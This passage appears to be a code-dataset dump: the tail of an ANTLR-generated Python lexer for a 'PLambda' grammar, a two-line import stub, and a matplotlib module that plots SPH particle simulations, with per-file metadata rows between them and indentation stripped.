buf.write("\t\22\2\2\u00f6\u00f7\t\7\2\2\u00f7\u00f8\t\23\2\2\u00f8")
buf.write("\u00f9\t\4\2\2\u00f9&\3\2\2\2\u00fa\u00fb\t\3\2\2\u00fb")
buf.write("\u00fc\t\13\2\2\u00fc\u00fd\t\f\2\2\u00fd\u00fe\t\22\2")
buf.write("\2\u00fe\u00ff\t\7\2\2\u00ff\u0100\t\23\2\2\u0100\u0101")
buf.write("\t\4\2\2\u0101(\3\2\2\2\u0102\u0103\t\n\2\2\u0103\u0104")
buf.write("\t\7\2\2\u0104\u0105\t\24\2\2\u0105*\3\2\2\2\u0106\u0107")
buf.write("\t\t\2\2\u0107\u0108\t\24\2\2\u0108\u0109\t\21\2\2\u0109")
buf.write(",\3\2\2\2\u010a\u010b\t\25\2\2\u010b\u010c\t\r\2\2\u010c")
buf.write("\u010d\t\t\2\2\u010d\u010e\t\25\2\2\u010e\u010f\t\26\2")
buf.write("\2\u010f.\3\2\2\2\u0110\u0111\t\17\2\2\u0111\u0112\t\7")
buf.write("\2\2\u0112\u0113\t\7\2\2\u0113\u0114\t\b\2\2\u0114\u0115")
buf.write("\t\4\2\2\u0115\u0116\t\r\2\2\u0116\u0117\t\f\2\2\u0117")
buf.write("\60\3\2\2\2\u0118\u0119\t\n\2\2\u0119\u011a\t\b\2\2\u011a")
buf.write("\u011b\t\7\2\2\u011b\u011c\t\r\2\2\u011c\u011d\t\t\2\2")
buf.write("\u011d\62\3\2\2\2\u011e\u011f\t\13\2\2\u011f\u0120\t\f")
buf.write("\2\2\u0120\u0121\t\t\2\2\u0121\64\3\2\2\2\u0122\u0123")
buf.write("\t\b\2\2\u0123\u0124\t\7\2\2\u0124\u0125\t\r\2\2\u0125")
buf.write("\u0126\t\6\2\2\u0126\66\3\2\2\2\u0127\u0128\t\13\2\2\u0128")
buf.write("\u0129\t\16\2\2\u0129\u012a\t\20\2\2\u012a\u012b\t\7\2")
buf.write("\2\u012b\u012c\t\24\2\2\u012c\u012d\t\t\2\2\u012d8\3\2")
buf.write("\2\2\u012e\u012f\t\13\2\2\u012f\u0130\t\3\2\2\u0130\u0131")
buf.write("\t\f\2\2\u0131\u0132\t\7\2\2\u0132\u0133\t\f\2\2\u0133")
buf.write("\u0134\t\4\2\2\u0134:\3\2\2\2\u0135\u0136\t\13\2\2\u0136")
buf.write("\u0137\t\3\2\2\u0137\u0138\t\7\2\2\u0138\u0139\t\17\2")
buf.write("\2\u0139\u013a\t\27\2\2\u013a\u013b\t\4\2\2\u013b\u013c")
buf.write("\t\25\2\2\u013c\u013d\t\t\2\2\u013d<\3\2\2\2\u013e\u013f")
buf.write("\t\13\2\2\u013f\u0140\t\3\2\2\u0140\u0141\t\13\2\2\u0141")
buf.write("\u0142\t\f\2\2\u0142\u0143\t\t\2\2\u0143>\3\2\2\2\u0144")
buf.write("\u0145\t\13\2\2\u0145\u0146\t\3\2\2\u0146\u0147\t\n\2")
buf.write("\2\u0147\u0148\t\b\2\2\u0148\u0149\t\7\2\2\u0149\u014a")
buf.write("\t\r\2\2\u014a\u014b\t\t\2\2\u014b@\3\2\2\2\u014c\u014d")
buf.write("\t\30\2\2\u014d\u014e\t\4\2\2\u014e\u014f\t\t\2\2\u014f")
buf.write("\u0150\t\31\2\2\u0150\u0151\t\13\2\2\u0151\u0152\t\6\2")
buf.write("\2\u0152B\3\2\2\2\u0153\u0154\t\30\2\2\u0154\u0155\t\b")
buf.write("\2\2\u0155\u0156\t\7\2\2\u0156\u0157\t\17\2\2\u0157\u0158")
buf.write("\t\r\2\2\u0158\u0159\t\b\2\2\u0159D\3\2\2\2\u015a\u015b")
buf.write("\t\f\2\2\u015b\u015c\t\7\2\2\u015c\u015d\t\t\2\2\u015d")
buf.write("F\3\2\2\2\u015e\u015f\t\t\2\2\u015f\u0160\t\26\2\2\u0160")
buf.write("\u0161\t\24\2\2\u0161\u0162\t\7\2\2\u0162\u0163\t\32\2")
buf.write("\2\u0163H\3\2\2\2\u0164\u0165\t\n\2\2\u0165\u0166\t\4")
buf.write("\2\2\u0166\u0167\t\t\2\2\u0167\u0168\t\25\2\2\u0168\u0169")
buf.write("\t\26\2\2\u0169J\3\2\2\2\u016a\u016b\t\f\2\2\u016b\u016c")
buf.write("\t\r\2\2\u016c\u016d\t\24\2\2\u016d\u016e\t\24\2\2\u016e")
buf.write("\u016f\t\7\2\2\u016f\u0170\t\32\2\2\u0170L\3\2\2\2\u0171")
buf.write("\u0172\t\13\2\2\u0172\u0173\t\f\2\2\u0173\u0174\t\3\2")
buf.write("\2\u0174\u0175\t\t\2\2\u0175\u0176\t\r\2\2\u0176\u0177")
buf.write("\t\f\2\2\u0177\u0178\t\25\2\2\u0178\u0179\t\4\2\2\u0179")
buf.write("\u017a\t\7\2\2\u017a\u017b\t\n\2\2\u017bN\3\2\2\2\u017c")
buf.write("\u017d\t\30\2\2\u017d\u017e\t\4\2\2\u017e\u017f\t\t\2")
buf.write("\2\u017fP\3\2\2\2\u0180\u0181\t\13\2\2\u0181\u0182\t\f")
buf.write("\2\2\u0182R\3\2\2\2\u0183\u0184\t\13\2\2\u0184\u0185\t")
buf.write("\3\2\2\u0185T\3\2\2\2\u0186\u0187\t\b\2\2\u0187\u0188")
buf.write("\t\7\2\2\u0188\u0189\t\7\2\2\u0189\u018a\t\23\2\2\u018a")
buf.write("\u018b\t\31\2\2\u018b\u018c\t\20\2\2\u018cV\3\2\2\2\u018d")
buf.write("\u018e\t\3\2\2\u018e\u018f\t\4\2\2\u018f\u0190\t\t\2\2")
buf.write("\u0190\u0191\t\31\2\2\u0191\u0192\t\13\2\2\u0192\u0193")
buf.write("\t\6\2\2\u0193X\3\2\2\2\u0194\u0195\t\23\2\2\u0195\u0196")
buf.write("\t\32\2\2\u0196\u0197\t\r\2\2\u0197\u0198\t\20\2\2\u0198")
buf.write("\u0199\t\20\2\2\u0199\u019a\t\b\2\2\u019a\u019b\t\21\2")
buf.write("\2\u019bZ\3\2\2\2\u019c\u019d\t\16\2\2\u019d\u019e\t\7")
buf.write("\2\2\u019e\u019f\t\6\2\2\u019f\u01a0\t\13\2\2\u01a0\u01a1")
buf.write("\t\n\2\2\u01a1\u01a2\t\21\2\2\u01a2\\\3\2\2\2\u01a3\u01a4")
buf.write("\t\31\2\2\u01a4\u01a5\t\20\2\2\u01a5\u01a6\t\6\2\2\u01a6")
buf.write("\u01a7\t\r\2\2\u01a7\u01a8\t\t\2\2\u01a8\u01a9\t\4\2\2")
buf.write("\u01a9^\3\2\2\2\u01aa\u01ab\t\3\2\2\u01ab\u01ac\t\31\2")
buf.write("\2\u01ac\u01ad\t\20\2\2\u01ad\u01ae\t\6\2\2\u01ae\u01af")
buf.write("\t\r\2\2\u01af\u01b0\t\t\2\2\u01b0\u01b1\t\4\2\2\u01b1")
buf.write("`\3\2\2\2\u01b2\u01b3\t\3\2\2\u01b3\u01b4\t\4\2\2\u01b4")
buf.write("\u01b5\t\t\2\2\u01b5\u01b6\t\r\2\2\u01b6\u01b7\t\t\2\2")
buf.write("\u01b7\u01b8\t\t\2\2\u01b8\u01b9\t\24\2\2\u01b9b\3\2\2")
buf.write("\2\u01ba\u01bb\t\25\2\2\u01bb\u01bc\t\7\2\2\u01bc\u01bd")
buf.write("\t\f\2\2\u01bd\u01be\t\25\2\2\u01be\u01bf\t\r\2\2\u01bf")
buf.write("\u01c0\t\t\2\2\u01c0d\3\2\2\2\u01c1\u01c2\t\r\2\2\u01c2")
buf.write("\u01c3\t\f\2\2\u01c3\u01c4\t\6\2\2\u01c4f\3\2\2\2\u01c5")
buf.write("\u01c6\t\7\2\2\u01c6\u01c7\t\24\2\2\u01c7h\3\2\2\2\u01c8")
buf.write("\u01c9\t\16\2\2\u01c9\u01ca\t\23\2\2\u01ca\u01cb\t\t\2")
buf.write("\2\u01cb\u01cc\t\31\2\2\u01cc\u01cd\t\20\2\2\u01cd\u01ce")
buf.write("\t\b\2\2\u01ce\u01cf\t\4\2\2\u01cfj\3\2\2\2\u01d0\u01d1")
buf.write("\t\16\2\2\u01d1\u01d2\t\23\2\2\u01d2\u01d3\t\b\2\2\u01d3")
buf.write("\u01d4\t\13\2\2\u01d4\u01d5\t\3\2\2\u01d5\u01d6\t\t\2")
buf.write("\2\u01d6l\3\2\2\2\u01d7\u01d8\t\16\2\2\u01d8\u01d9\t\23")
buf.write("\2\2\u01d9\u01da\t\6\2\2\u01da\u01db\t\13\2\2\u01db\u01dc")
buf.write("\t\25\2\2\u01dc\u01dd\t\t\2\2\u01ddn\3\2\2\2\u01de\u01df")
buf.write("\7/\2\2\u01dfp\3\2\2\2\u01e0\u01e1\t\13\2\2\u01e1\u01e2")
buf.write("\t\n\2\2\u01e2r\3\2\2\2\u01e3\u01e4\t\30\2\2\u01e4\u01e5")
buf.write("\t\4\2\2\u01e5\u01e6\t\t\2\2\u01e6\u01e7\t\r\2\2\u01e7")
buf.write("\u01e8\t\t\2\2\u01e8\u01e9\t\t\2\2\u01e9\u01ea\t\24\2")
buf.write("\2\u01eat\3\2\2\2\u01eb\u01ef\5\u0085C\2\u01ec\u01ef\5")
buf.write("\u0083B\2\u01ed\u01ef\5y=\2\u01ee\u01eb\3\2\2\2\u01ee")
buf.write("\u01ec\3\2\2\2\u01ee\u01ed\3\2\2\2\u01ef\u01f5\3\2\2\2")
buf.write("\u01f0\u01f4\5\u0083B\2\u01f1\u01f4\5y=\2\u01f2\u01f4")
buf.write("\5\u0085C\2\u01f3\u01f0\3\2\2\2\u01f3\u01f1\3\2\2\2\u01f3")
buf.write("\u01f2\3\2\2\2\u01f4\u01f7\3\2\2\2\u01f5\u01f3\3\2\2\2")
buf.write("\u01f5\u01f6\3\2\2\2\u01f6v\3\2\2\2\u01f7\u01f5\3\2\2")
buf.write("\2\u01f8\u01fa\7/\2\2\u01f9\u01f8\3\2\2\2\u01f9\u01fa")
buf.write("\3\2\2\2\u01fa\u020f\3\2\2\2\u01fb\u01fd\7\60\2\2\u01fc")
buf.write("\u01fe\5y=\2\u01fd\u01fc\3\2\2\2\u01fe\u01ff\3\2\2\2\u01ff")
buf.write("\u01fd\3\2\2\2\u01ff\u0200\3\2\2\2\u0200\u0210\3\2\2\2")
buf.write("\u0201\u0203\5y=\2\u0202\u0201\3\2\2\2\u0203\u0204\3\2")
buf.write("\2\2\u0204\u0202\3\2\2\2\u0204\u0205\3\2\2\2\u0205\u020d")
buf.write("\3\2\2\2\u0206\u020a\7\60\2\2\u0207\u0209\5y=\2\u0208")
buf.write("\u0207\3\2\2\2\u0209\u020c\3\2\2\2\u020a\u0208\3\2\2\2")
buf.write("\u020a\u020b\3\2\2\2\u020b\u020e\3\2\2\2\u020c\u020a\3")
buf.write("\2\2\2\u020d\u0206\3\2\2\2\u020d\u020e\3\2\2\2\u020e\u0210")
buf.write("\3\2\2\2\u020f\u01fb\3\2\2\2\u020f\u0202\3\2\2\2\u0210")
buf.write("x\3\2\2\2\u0211\u0212\t\33\2\2\u0212z\3\2\2\2\u0213\u0218")
buf.write("\7)\2\2\u0214\u0217\5}?\2\u0215\u0217\13\2\2\2\u0216\u0214")
buf.write("\3\2\2\2\u0216\u0215\3\2\2\2\u0217\u021a\3\2\2\2\u0218")
buf.write("\u0219\3\2\2\2\u0218\u0216\3\2\2\2\u0219\u021b\3\2\2\2")
buf.write("\u021a\u0218\3\2\2\2\u021b\u021c\7)\2\2\u021c|\3\2\2\2")
buf.write("\u021d\u021e\7^\2\2\u021e\u0222\7)\2\2\u021f\u0220\7^")
buf.write("\2\2\u0220\u0222\7^\2\2\u0221\u021d\3\2\2\2\u0221\u021f")
buf.write("\3\2\2\2\u0222~\3\2\2\2\u0223\u0228\7$\2\2\u0224\u0227")
buf.write("\5\u0081A\2\u0225\u0227\13\2\2\2\u0226\u0224\3\2\2\2\u0226")
buf.write("\u0225\3\2\2\2\u0227\u022a\3\2\2\2\u0228\u0229\3\2\2\2")
buf.write("\u0228\u0226\3\2\2\2\u0229\u022b\3\2\2\2\u022a\u0228\3")
buf.write("\2\2\2\u022b\u022c\7$\2\2\u022c\u0080\3\2\2\2\u022d\u022e")
buf.write("\7^\2\2\u022e\u0232\7$\2\2\u022f\u0230\7^\2\2\u0230\u0232")
buf.write("\7^\2\2\u0231\u022d\3\2\2\2\u0231\u022f\3\2\2\2\u0232")
buf.write("\u0082\3\2\2\2\u0233\u0234\t\34\2\2\u0234\u0084\3\2\2")
buf.write("\2\u0235\u0236\t\35\2\2\u0236\u0086\3\2\2\2\u0237\u023b")
buf.write("\7=\2\2\u0238\u023a\13\2\2\2\u0239\u0238\3\2\2\2\u023a")
buf.write("\u023d\3\2\2\2\u023b\u023c\3\2\2\2\u023b\u0239\3\2\2\2")
buf.write("\u023c\u023f\3\2\2\2\u023d\u023b\3\2\2\2\u023e\u0240\7")
buf.write("\17\2\2\u023f\u023e\3\2\2\2\u023f\u0240\3\2\2\2\u0240")
buf.write("\u0241\3\2\2\2\u0241\u0242\7\f\2\2\u0242\u0243\3\2\2\2")
buf.write("\u0243\u0244\bD\2\2\u0244\u0088\3\2\2\2\u0245\u0246\7")
buf.write("\61\2\2\u0246\u0247\7\61\2\2\u0247\u024b\3\2\2\2\u0248")
buf.write("\u024a\13\2\2\2\u0249\u0248\3\2\2\2\u024a\u024d\3\2\2")
buf.write("\2\u024b\u024c\3\2\2\2\u024b\u0249\3\2\2\2\u024c\u024f")
buf.write("\3\2\2\2\u024d\u024b\3\2\2\2\u024e\u0250\7\17\2\2\u024f")
buf.write("\u024e\3\2\2\2\u024f\u0250\3\2\2\2\u0250\u0251\3\2\2\2")
buf.write("\u0251\u0252\7\f\2\2\u0252\u0253\3\2\2\2\u0253\u0254\b")
buf.write("E\2\2\u0254\u008a\3\2\2\2\u0255\u0256\7\61\2\2\u0256\u0257")
buf.write("\7,\2\2\u0257\u025b\3\2\2\2\u0258\u025a\13\2\2\2\u0259")
buf.write("\u0258\3\2\2\2\u025a\u025d\3\2\2\2\u025b\u025c\3\2\2\2")
buf.write("\u025b\u0259\3\2\2\2\u025c\u025e\3\2\2\2\u025d\u025b\3")
buf.write("\2\2\2\u025e\u025f\7,\2\2\u025f\u0260\7\61\2\2\u0260\u0261")
buf.write("\3\2\2\2\u0261\u0262\bF\2\2\u0262\u008c\3\2\2\2\u0263")
buf.write("\u0265\t\36\2\2\u0264\u0263\3\2\2\2\u0265\u0266\3\2\2")
buf.write("\2\u0266\u0264\3\2\2\2\u0266\u0267\3\2\2\2\u0267\u0268")
buf.write("\3\2\2\2\u0268\u0269\bG\2\2\u0269\u008e\3\2\2\2\37\2\u0095")
buf.write("\u009a\u00a7\u00b8\u00bf\u00c7\u00cd\u01ee\u01f3\u01f5")
buf.write("\u01f9\u01ff\u0204\u020a\u020d\u020f\u0216\u0218\u0221")
buf.write("\u0226\u0228\u0231\u023b\u023f\u024b\u024f\u025b\u0266")
buf.write("\3\b\2\2")
return buf.getvalue()
class PLambdaLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
T__0 = 1
T__1 = 2
STRING = 3
PRIMITIVE_DATA_OP = 4
UNARY_OP = 5
BINARY_OP = 6
TERNARY_OP = 7
N_ARY_OP = 8
AMBI1_OP = 9
AMBI2_OP = 10
NONE = 11
SEQ = 12
DO = 13
LET = 14
DEFINE = 15
LAMBDA = 16
APPLY = 17
INVOKE = 18
SINVOKE = 19
FOR = 20
TRY = 21
CATCH = 22
BOOLEAN = 23
FLOAT = 24
INT = 25
LOAD = 26
IMPORT = 27
ISNONE = 28
ISOBJECT = 29
ISINT = 30
ISFLOAT = 31
GETUID = 32
GLOBAL = 33
NOT = 34
THROW = 35
FETCH = 36
NARROW = 37
INSTANCEOF = 38
GET = 39
IN = 40
IS = 41
LOOKUP = 42
SETUID = 43
KWAPPLY = 44
MODIFY = 45
UPDATE = 46
SUPDATE = 47
SETATTR = 48
CONCAT = 49
AND = 50
OR = 51
MKTUPLE = 52
MKLIST = 53
MKDICT = 54
MINUS = 55
IF = 56
GETATTR = 57
ID = 58
NUMBER = 59
STRING_SQ = 60
STRING_DQ = 61
SYMBOL = 62
LINE_COMMENT = 63
NEW_LINE_COMMENT = 64
NEW_COMMENT = 65
WHITE_SPACE = 66
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE" ]
literalNames = [ "<INVALID>",
"'('", "')'", "'None'", "'-'" ]
symbolicNames = [ "<INVALID>",
"STRING", "PRIMITIVE_DATA_OP", "UNARY_OP", "BINARY_OP", "TERNARY_OP",
"N_ARY_OP", "AMBI1_OP", "AMBI2_OP", "NONE", "SEQ", "DO", "LET",
"DEFINE", "LAMBDA", "APPLY", "INVOKE", "SINVOKE", "FOR", "TRY",
"CATCH", "BOOLEAN", "FLOAT", "INT", "LOAD", "IMPORT", "ISNONE",
"ISOBJECT", "ISINT", "ISFLOAT", "GETUID", "GLOBAL", "NOT", "THROW",
"FETCH", "NARROW", "INSTANCEOF", "GET", "IN", "IS", "LOOKUP",
"SETUID", "KWAPPLY", "MODIFY", "UPDATE", "SUPDATE", "SETATTR",
"CONCAT", "AND", "OR", "MKTUPLE", "MKLIST", "MKDICT", "MINUS",
"IF", "GETATTR", "ID", "NUMBER", "STRING_SQ", "STRING_DQ", "SYMBOL",
"LINE_COMMENT", "NEW_LINE_COMMENT", "NEW_COMMENT", "WHITE_SPACE" ]
ruleNames = [ "T__0", "T__1", "STRING", "PRIMITIVE_DATA_OP", "UNARY_OP",
"BINARY_OP", "TERNARY_OP", "N_ARY_OP", "AMBI1_OP", "AMBI2_OP",
"NONE", "SEQ", "DO", "LET", "DEFINE", "LAMBDA", "APPLY",
"INVOKE", "SINVOKE", "FOR", "TRY", "CATCH", "BOOLEAN",
"FLOAT", "INT", "LOAD", "IMPORT", "ISNONE", "ISOBJECT",
"ISINT", "ISFLOAT", "GETUID", "GLOBAL", "NOT", "THROW",
"FETCH", "NARROW", "INSTANCEOF", "GET", "IN", "IS", "LOOKUP",
"SETUID", "KWAPPLY", "MODIFY", "UPDATE", "SUPDATE", "SETATTR",
"CONCAT", "AND", "OR", "MKTUPLE", "MKLIST", "MKDICT",
"MINUS", "IF", "GETATTR", "ID", "NUMBER", "DIGIT", "STRING_SQ",
"ESCAPE_SQ", "STRING_DQ", "ESCAPE_DQ", "LETTER", "SYMBOL",
"LINE_COMMENT", "NEW_LINE_COMMENT", "NEW_COMMENT", "WHITE_SPACE" ]
grammarFileName = "PLambda.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.8")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
| 61.75895
| 103
| 0.568652
| 5,963
| 25,877
| 2.454805
| 0.143384
| 0.128433
| 0.067837
| 0.07706
| 0.269982
| 0.20966
| 0.124676
| 0.108963
| 0.103566
| 0.101107
| 0
| 0.347026
| 0.145767
| 25,877
| 418
| 104
| 61.906699
| 0.315178
| 0.001468
| 0
| 0.015
| 1
| 0.6075
| 0.640759
| 0.60151
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005
| false
| 0
| 0.0175
| 0
| 0.2125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a51c7ebdcc1329a88abc56ae0199dbfac04761c6
| 29
|
py
|
Python
|
scripts/ope.py
|
woowonjin/Reinforcement_Leraning_for_Optimal_Sepsis_Treatment
|
caf78cf5406194868e40ecc5e1a30d8b060fce18
|
[
"MIT"
] | null | null | null |
scripts/ope.py
|
woowonjin/Reinforcement_Leraning_for_Optimal_Sepsis_Treatment
|
caf78cf5406194868e40ecc5e1a30d8b060fce18
|
[
"MIT"
] | null | null | null |
scripts/ope.py
|
woowonjin/Reinforcement_Leraning_for_Optimal_Sepsis_Treatment
|
caf78cf5406194868e40ecc5e1a30d8b060fce18
|
[
"MIT"
] | 1
|
2022-02-04T10:42:09.000Z
|
2022-02-04T10:42:09.000Z
|
import numpy as np
import os
| 9.666667
| 18
| 0.793103
| 6
| 29
| 3.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206897
| 29
| 2
| 19
| 14.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
eb5ba0696311237724207df2c2a947719a884c56
| 9,956
|
py
|
Python
|
src/plotParticles.py
|
rubenpersicot/mouving_boundaries
|
efa263748b5ff9747db2e8d60ef981e8aa1dadaa
|
[
"MIT"
] | null | null | null |
src/plotParticles.py
|
rubenpersicot/mouving_boundaries
|
efa263748b5ff9747db2e8d60ef981e8aa1dadaa
|
[
"MIT"
] | null | null | null |
src/plotParticles.py
|
rubenpersicot/mouving_boundaries
|
efa263748b5ff9747db2e8d60ef981e8aa1dadaa
|
[
"MIT"
] | null | null | null |
###########################################################################
###########################################################################
# SPyH
###########################################################################
###########################################################################
#Authors : R. Carmigniani & D. Violeau
#Version : SPyH.0
#Contact : remi.carmigniani@enpc.fr
###########################################################################
# Some useful imports
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rcParams['text.usetex'] = True
matplotlib.rc('text', usetex=True)
from matplotlib.patches import Polygon
from matplotlib.collections import PolyCollection
from matplotlib.collections import PatchCollection
import matplotlib.colorbar as cbar
import matplotlib.cm
from src.spyh import *
from src.sphvar import *
def plotPropertiesWithBound(part,partProp,nameBar,bounds,dr,PARTFIG):
'''
input :
-part : list of particles
-partProp : array of data to display
-nameBar : legend for the bar color
-bounds :
[xMin,xMax,yMin,yMax,propMin, propMax] the bound of the domain and color bar
-PARTFIG : the ID of the plot
output :
-display a png image of the simulation but does not save it
'''
if len(bounds)==6:
xMin = bounds[0]
xMax = bounds[1]
yMin = bounds[2]
yMax = bounds[3]
propMin = bounds[4]
propMax = bounds[5]
else:
print('Error the bounds should have 6 inputs!!! check plotParticles function')
return
#Create a colormap
def f_color_map(x):
Nstep = 100
jet = matplotlib.cm.get_cmap('jet',Nstep)
return jet((x-propMin)/(propMax-propMin))
cmap = plt.cm.jet
normal = plt.Normalize(propMin,propMax) # my numbers from 0-1
infoTab = part[:,INFO]
cnts = part[infoTab==FLUID][:,POS]
offs = np.ones([4,len(cnts),2])
offs[0,:,:] = [-dr/2,-dr/2]
offs[1,:,:] = [dr/2,-dr/2]
offs[2,:,:] = [dr/2,dr/2]
offs[3,:,:] = [-dr/2,dr/2]
vrts_fluid = cnts + offs
vrts_fluid = np.swapaxes(vrts_fluid, 0, 1)
cnts = part[infoTab==BOUND][:,POS]
offs = np.ones([4,len(cnts),2])
offs[0,:,:] = [-dr/2,-dr/2]
offs[1,:,:] = [dr/2,-dr/2]
offs[2,:,:] = [dr/2,dr/2]
offs[3,:,:] = [-dr/2,dr/2]
vrts_bound = cnts + offs
vrts_bound = np.swapaxes(vrts_bound, 0, 1)
#MOBILE BOUNDARIES PROPERTIES
cnts = part[infoTab==MOBILEBOUND][:,POS]
offs = np.ones([4,len(cnts),2])
offs[0,:,:] = [-dr/2,-dr/2]
offs[1,:,:] = [dr/2,-dr/2]
offs[2,:,:] = [dr/2,dr/2]
offs[3,:,:] = [-dr/2,dr/2]
vrts_mobilebound = cnts + offs
vrts_mobilebound = np.swapaxes(vrts_mobilebound, 0, 1)
#MOBILE SOLIDS PROPERTIES
cnts = part[infoTab==MOBILESOLID][:,POS]
offs = np.ones([4,len(cnts),2])
offs[0,:,:] = [-dr/2,-dr/2]
offs[1,:,:] = [dr/2,-dr/2]
offs[2,:,:] = [dr/2,dr/2]
offs[3,:,:] = [-dr/2,dr/2]
vrts_mobilesolid = cnts + offs
vrts_mobilesolid = np.swapaxes(vrts_mobilesolid, 0, 1)
rgb = f_color_map(partProp[infoTab==FLUID])
# create the figure
fig = plt.figure(PARTFIG)
ax_list = fig.axes#check if the figure is already open else get back the subplot axes
if len(ax_list)<1:
ax = fig.subplots()
else:
ax = ax_list[0]
coll = PolyCollection(vrts_fluid,array=None,facecolors=rgb,edgecolor='black',linewidths=0.1)
ax.add_collection(coll)
coll = PolyCollection(vrts_bound,array=None,facecolors='gray',edgecolor='black',linewidths=0.1)
ax.add_collection(coll)
coll = PolyCollection(vrts_mobilebound,array=None,facecolors='white',edgecolor='black',linewidths=0.1)
ax.add_collection(coll)
coll = PolyCollection(vrts_mobilesolid,array=None,facecolors='purple',edgecolor='black',linewidths=0.1)
ax.add_collection(coll)
ax.set_aspect('equal')
plt.xlabel('$x$(m)',fontsize=18)
plt.ylabel('$y$(m)',fontsize=18)
plt.xlim(xMin,xMax)
plt.ylim(yMin,yMax)
plt.tight_layout()
ax = plt.gca()
ax.tick_params(axis = 'both', which = 'major', labelsize = 18)
ax.xaxis.set_major_locator(plt.MaxNLocator(5))
ax.yaxis.set_major_locator(plt.MaxNLocator(5))
cax, _ = cbar.make_axes(ax)
cb2 = cbar.ColorbarBase(cax, cmap=cmap,norm=normal)
cb2.set_label(nameBar,fontsize=18)
ax = plt.gca()
ax.tick_params(axis = 'both', which = 'major', labelsize = 18)
##fig.savefig(figname,bbox_inches='tight')
plt.show(block=False)
plt.draw()
def particleOutline(part,partID,color,dr,PARTFIG):
# input :
# -part : list of particles
# -PartID : np.array of the particles to display
# -color : the color of the edge to outline
# -PARTFIG : the ID of the plot
# output :
# -display a png image of the simulation but does not save it
fig = plt.figure(PARTFIG)
ax = fig.axes
ax = ax[0]
fluidPart = part[partID][:,POS]
cnts = fluidPart[:]
offs = np.ones([4,len(fluidPart),2])
offs[0,:,:] = [-dr/2,-dr/2]
offs[1,:,:] = [dr/2,-dr/2]
offs[2,:,:] = [dr/2,dr/2]
offs[3,:,:] = [-dr/2,dr/2]
vrts_fluid = cnts + offs
vrts_fluid = np.swapaxes(vrts_fluid, 0, 1)
coll = PolyCollection(vrts_fluid,array=None,facecolors='none',edgecolor=color,linewidths=3)
ax.add_collection(coll)
plt.show(block=False)
plt.draw()
def plotSpaces(posSpace,color,lspace,PARTFIG):
# input :
# -space : list of particles
# -color : the ID of the plot
# -PARTFIG : the ID of the plot
# output :
# -display a png image of the simulation but does not save it
fig = plt.figure(PARTFIG)
ax = fig.axes
ax = ax[0]
cnts = posSpace
offs = np.ones([4,len(posSpace),2])
offs[0,:,:] = [-lspace/2,-lspace/2]
offs[1,:,:] = [lspace/2,-lspace/2]
offs[2,:,:] = [lspace/2,lspace/2]
offs[3,:,:] = [-lspace/2,lspace/2]
vrts_space = cnts + offs
vrts_space = np.swapaxes(vrts_space, 0, 1)
coll = PolyCollection(vrts_space,array=None,facecolors='none',edgecolor=color,linewidths=1)
ax.add_collection(coll)
for i in range(len(posSpace)):
ax.text(posSpace[i,0], posSpace[i,1],r''+repr(i), fontsize=14,horizontalalignment='center',verticalalignment='center')
plt.show(block=False)
plt.draw()
def spacesOutline(posSpace,color,lspace,PARTFIG):
# input :
# -space : list of particles
# -color : the ID of the plot
# -PARTFIG : the ID of the plot
# output :
# -display a png image of the simulation but does not save it
fig = plt.figure(PARTFIG)
ax = fig.axes
ax = ax[0]
cnts = posSpace
offs = np.ones([4,len(posSpace),2])
offs[0,:,:] = [-lspace/2,-lspace/2]
offs[1,:,:] = [lspace/2,-lspace/2]
offs[2,:,:] = [lspace/2,lspace/2]
offs[3,:,:] = [-lspace/2,lspace/2]
vrts_space = cnts + offs
vrts_space = np.swapaxes(vrts_space, 0, 1)
coll = PolyCollection(vrts_space,array=None,facecolors='none',edgecolor=color,linewidths=1)
ax.add_collection(coll)
plt.show(block=False)
plt.draw()
def quiverPlot(part,sc,PARTFIG):
# input :
# -part : list of particles
# -sc : scale of the vector
# -PARTFIG : the ID of the plot
# output :
# -display a png image of the simulation but does not save it
# create the figure
fig = plt.figure(PARTFIG)
ax_list = fig.axes#check if the figure is already open else get back the subplot axes
if len(ax_list)<1:
ax = fig.subplots()
else:
ax = ax_list[0]
x=part[:,POS[0]]
y=part[:,POS[1]]
u=part[:,VEL[0]]
v=part[:,VEL[1]]
ax.quiver(x,y,u,v,scale=sc,scale_units='inches')
##fig.savefig(figname,bbox_inches='tight')
plt.show(block=False)
plt.draw()
def plotProperties(part,partProp,nameBar,bounds,dr,PARTFIG):
'''
input :
-part : list of particles
-partProp : array of data to display
-nameBar : legend for the bar color
-bounds :
[xMin,xMax,yMin,yMax,propMin, propMax] the bound of the domain and color bar
-PARTFIG : the ID of the plot
output :
-display a png image of the simulation but does not save it
'''
if len(bounds)==6:
xMin = bounds[0]
xMax = bounds[1]
yMin = bounds[2]
yMax = bounds[3]
propMin = bounds[4]
propMax = bounds[5]
else:
print('Error the bounds should have 6 inputs!!! check plotParticles function')
return
#Create a colormap
def f_color_map(x):
Nstep = 100
jet = matplotlib.cm.get_cmap('jet',Nstep)
return jet((x-propMin)/(propMax-propMin))
cmap = plt.cm.jet
normal = plt.Normalize(propMin,propMax) # my numbers from 0-1
infoTab = part[:,INFO]
cnts = part[:,POS]
